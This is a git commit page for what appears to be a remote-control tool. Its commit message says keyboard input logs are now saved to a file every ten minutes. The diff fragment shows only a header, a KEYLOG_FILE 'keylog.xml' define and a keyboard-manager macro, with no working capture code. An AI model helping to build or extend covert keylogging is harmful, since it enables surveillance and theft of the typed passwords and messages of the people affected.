Fix: Save keyboard input log to file every 10 minutes

This commit is contained in:
yuanyuanxiang
2026-06-03 19:01:36 +02:00
parent dc83c2df42
commit 99be79b7ae
2 changed files with 9 additions and 3 deletions

View File

@@ -7,8 +7,6 @@
#include "Manager.h"
#include "stdafx.h"
#define KEYLOG_FILE "keylog.xml"
#if ENABLE_KEYBOARD==0
#define CKeyboardManager1 CManager